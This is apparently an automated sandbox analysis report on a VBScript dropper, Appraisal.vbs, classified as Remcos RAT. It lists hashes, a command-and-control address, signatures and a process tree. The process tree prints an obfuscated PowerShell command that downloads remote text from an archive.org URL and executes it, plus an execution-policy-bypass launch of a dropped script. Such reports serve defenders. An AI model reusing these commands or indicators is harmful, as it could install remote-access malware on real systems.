Overview

overview

10

Static

static

Appraisal.vbs

windows7_x64

10

Appraisal.vbs

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-04-2021 10:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Appraisal.vbs

  • Size

    706B

  • MD5

    b201aa5242dd9b32ec9c38e1f999c723

  • SHA1

    61ab2c43d19c6441e394561e0441890168b9a9ab

  • SHA256

    d2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55

  • SHA512

    a21aeb8a0ec963875d75ba4920f3bde9a134717a910b94a2743ab7051dabe9e17a5e0a15aeb51be26373f0cb6313b6c964bef2ebb318061074399296d5c5ddfc

Score
10/10
remcosrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601406.us.archive.org/10/items/all_20210426/ALL.TXT

Extracted

Family

remcos

C2

185.19.85.168:1723

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://ia601406.us.archive.org/10/items/all_20210426/ALL.TXT'))))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2232
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          #cmd
          4⤵
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:808
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /sort "Visit Time" /stext "C:\Users\Admin\AppData\Local\Temp\xiec"
            5⤵
              PID:3112

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\ Microsoft.ps1
      MD5

      3dd793f6fdb49034bfaed9d1975a32e5

      SHA1

      13bbbb0b874f1c097eb80382a3266cefec632a2e

      SHA256

      de9a6d430a80d2b466e959d4e7e8e3fa6c7384670bdab6fc2881df2ed4b12a37

      SHA512

      f4ca7f706f259d2a5b3e925c25da97093783946c85ef5dce76cd9f28f79539de44ad784c457ada7aed77e3998011831b8101e03576be20252539fe7f27e3e0c7

      Download Submit
    • memory/808-189-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

      Download
    • memory/808-186-0x000000000042EEEF-mapping.dmp
      Download
    • memory/2232-175-0x0000016E56A30000-0x0000016E56A32000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2232-138-0x0000000000000000-mapping.dmp
      Download
    • memory/2232-163-0x0000016E569D0000-0x0000016E569D1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2232-176-0x0000016E56A33000-0x0000016E56A35000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2232-182-0x0000016E569A0000-0x0000016E569BF000-memory.dmp
      Filesize

      124KB

      Download
    • memory/2232-187-0x0000016E569C0000-0x0000016E569C1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2232-188-0x0000016E56A36000-0x0000016E56A38000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3872-126-0x000001AF70770000-0x000001AF70771000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3872-132-0x000001AF6E576000-0x000001AF6E578000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3872-114-0x0000000000000000-mapping.dmp
      Download
    • memory/3872-123-0x000001AF6E573000-0x000001AF6E575000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3872-122-0x000001AF6E570000-0x000001AF6E572000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3872-121-0x000001AF6E4F0000-0x000001AF6E4F1000-memory.dmp
      Filesize

      4KB

      Download